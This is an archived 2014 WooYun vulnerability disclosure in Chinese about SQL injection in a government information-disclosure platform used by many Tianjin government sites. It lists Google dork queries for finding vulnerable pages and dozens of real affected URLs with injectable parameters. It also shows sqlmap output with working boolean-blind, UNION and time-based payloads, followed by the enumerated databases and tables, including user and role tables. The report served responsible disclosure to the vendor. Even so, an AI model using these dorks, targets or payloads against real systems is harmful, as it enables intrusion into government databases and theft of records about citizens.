乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-17: 细节已通知厂商并且等待厂商处理中 2014-07-22: 厂商已经确认,细节仅向厂商公开 2014-07-25: 细节向第三方安全合作伙伴开放 2014-09-15: 细节向核心白帽子及相关领域专家公开 2014-09-25: 细节向普通白帽子公开 2014-10-05: 细节向实习白帽子公开 2014-10-15: 细节向公众公开
前面还有3个没审核,继续提交求给力@
WooYun: 某通用型政府信息公开平台SQL注入漏洞 该信息公开平台主要涉及天津市,看了下还有其他注入,整理了一下。
google搜索:#1 inurl:GZZDInfordetail.jsp?id#2 inurl:FLGDInfordetail.jsp?id#3 inurl:gkznInfo.jsp?depcode#4 inurl:orgsiteInfo.jsp?orgid#5 inurl:js_NDBGInfordetail.jsp?id
影响案例(空格区分注入点):
http://www.tjzfxxgk.gov.cn/tjep/GZZDInfordetail.jsp?id=43http://info.tjjn.gov.cn/GZZDInfordetail.jsp?id=17http://xinxigk.baodi.gov.cn/GZZDInfordetail.jsp?id=10http://gk.tjjh.gov.cn/GZZDInfordetail.jsp?id=11http://xxgk.tjbc.cn/GZZDInfordetail.jsp?id=5http://www.tjnh.gov.cn:7002/GZZDInfordetail.jsp?id=7http://202.99.99.30/GZZDInfordetail.jsp?id=10http://gk.tjhqqzf.gov.cn/GZZDInfordetail.jsp?id=5http://zfxxgk.bh.gov.cn/GZZDInfordetail.jsp?id=9http://221.239.20.83/GZZDInfordetail.jsp?id=9http://218.69.96.137/GZZDInfordetail.jsp?id=2http://gk.tjheping.gov.cn:3030/GZZDInfordetail.jsp?id=14http://www.tjzfxxgk.gov.cn/tjep/FLGDInfordetail.jsp?id=43http://zwgk.tjhd.gov.cn:8000/FLGDInfordetail.jsp?id=11http://info.tjjn.gov.cn/FLGDInfordetail.jsp?id=28http://gk.tjjh.gov.cn/FLGDInfordetail.jsp?id=29http://www.tjnh.gov.cn:7002/FLGDInfordetail.jsp?id=14http://gk.tjhqqzf.gov.cn/FLGDInfordetail.jsp?id=5http://202.99.99.30/FLGDInfordetail.jsp?id=11http://zfxxgk.bh.gov.cn/FLGDInfordetail.jsp?id=10http://221.239.20.83/FLGDInfordetail.jsp?id=2http://zwgk.tjhexi.gov.cn:8080/FLGDInfordetail.jsp?id=1http://gk.tjheping.gov.cn:3030/FLGDInfordetail.jsp?id=11http://zwgk.tjhd.gov.cn:8000/gkznInfo.jsp?depcode=BBA15Mhttp://info.tjjn.gov.cn/gkznInfo.jsp?depcode=BOF04Ahttp://gk.tjnk.gov.cn/gkznInfo.jsp?depcode=BDA20Bhttp://xinxigk.baodi.gov.cn/gkznInfo.jsp?depcode=BNA05Fhttp://gk.tjjh.gov.cn/gkznInfo.jsp?depcode=BRA19Ghttp://gk.xq.gov.cn/gkznInfo.jsp?depcode=BJE01Ahttp://www.tjnh.gov.cn:7002/gkznInfo.jsp?depcode=BQA07Khttp://xxgk.tjbc.cn/gkznInfo.jsp?depcode=BLA25Ihttp://zwgk.tjhexi.gov.cn:8080/gkznInfo.jsp?depcode=BCE01Ahttp://gk.tjhqqzf.gov.cn/gkznInfo.jsp?depcode=BFA02Bhttp://202.99.99.30/gkznInfo.jsp?depcode=CBA10Ehttp://60.28.129.212/gkznInfo.jsp?depcode=BE0000http://61.181.146.98:7002/gkznInfo.jsp?depcode=BQA20Lhttp://218.69.106.201:8080/gkznInfo.jsp?depcode=BCA28Ahttp://221.239.20.83/gkznInfo.jsp?depcode=BKB23Ehttp://gk.tjwq.gov.cn/gkznInfo.jsp?depcode=BMF25Ahttp://218.69.96.137/gkznInfo.jsp?depcode=BMB04Chttp://60.30.65.156/gkznInfo.jsp?depcode=BNB05Lhttp://gk.tjheping.gov.cn:3030/gkznInfo.jsp?depcode=BAE02Ahttp://www.tjzfxxgk.gov.cn/tjep/orgsiteInfo.jsp?orgid=91http://xxgk.tjbc.cn/orgsiteInfo.jsp?orgid=102http://info.tjjn.gov.cn/js_NDBGInfordetail.jsp?id=5http://zwgk.tjhd.gov.cn:8000/js_NDBGInfordetail.jsp?id=4http://gk.xq.gov.cn/js_NDBGInfordetail.jsp?id=2http://xinxigk.baodi.gov.cn/js_NDBGInfordetail.jsp?id=7http://gk.tjjh.gov.cn/js_NDBGInfordetail.jsp?id=6http://www.tjzfxxgk.gov.cn/tjep/js_NDBGInfordetail.jsp?id=5http://www.tjnh.gov.cn:7002/js_NDBGInfordetail.jsp?id=13http://xxgk.tjbc.cn/js_NDBGInfordetail.jsp?id=8http://gk.tjhqqzf.gov.cn/js_NDBGInfordetail.jsp?id=4http://gk.tjnk.gov.cn/js_NDBGInfordetail.jsp?id=5http://zwgk.tjhexi.gov.cn:8080/js_NDBGInfordetail.jsp?id=2http://202.99.99.30/js_NDBGInfordetail.jsp?id=2http://zfxxgk.bh.gov.cn/js_NDBGInfordetail.jsp?id=4http://221.239.20.83/js_NDBGInfordetail.jsp?id=6
http://zwgk.tjhd.gov.cn:8000/gkznInfo.jsp?depcode=BBA15M
---Place: GETParameter: depcode Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: depcode=BBA15M' AND 5496=5496 AND 'bqId'='bqId Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: depcode=-4714' UNION ALL SELECT NULL,CONCAT(0x71726f6d71,0x76476b675449646c7179,0x7172696f71)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: depcode=BBA15M' AND SLEEP(5) AND 'uxUa'='uxUa---[22:34:30] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0.11
available databases [5]:[*] gbase[*] govinfo[*] information_schema[*] northwind[*] system
Database: govinfo[60 tables]+-----------------------+| all_info_tbl || appeal || apply_complaint_tbl || apply_delay_tbl || apply_fee_tbl || apply_indictment_tbl || apply_info_tbl || apply_pj_tbl || apply_reply_tbl || apply_update_tbl || applyuserview || au_function_rel || au_operator_info_tbl || au_role_function_rel || au_role_rel || au_user_role_rel || auapprolefunctionview || auoperatorroleview || commission_tbl || complaint || con_info_clob_tbl || con_info_reply_tbl || con_info_tbl || dbb_tbl || departments || dir_info_tbl || djlql_tbl || funs || get_way_tbl || ggl_tbl || gkzn_tbl || info_sort_tbl || link_tbl || mapping || messagerel || ndgzbg_tbl || operation_list_tbl || org_info_tbl || org_info_tbl_bak || org_site_info_tbl || org_user_info_tbl || org_user_info_tbl_bak || para_application_rel || para_depart_rank_rel || para_depart_rel || para_org_rel || pdf_tbl || plan_table || rolefuns || roles || roleusers || rules_info_tbl || sequence || user_roles_funs || users || visitcount || window_apply_info_tbl || work_time_tbl || zdsyh || zxwh_tbl |+-----------------------+
危害等级:高
漏洞Rank:20
确认时间:2014-07-22 14:23
暂无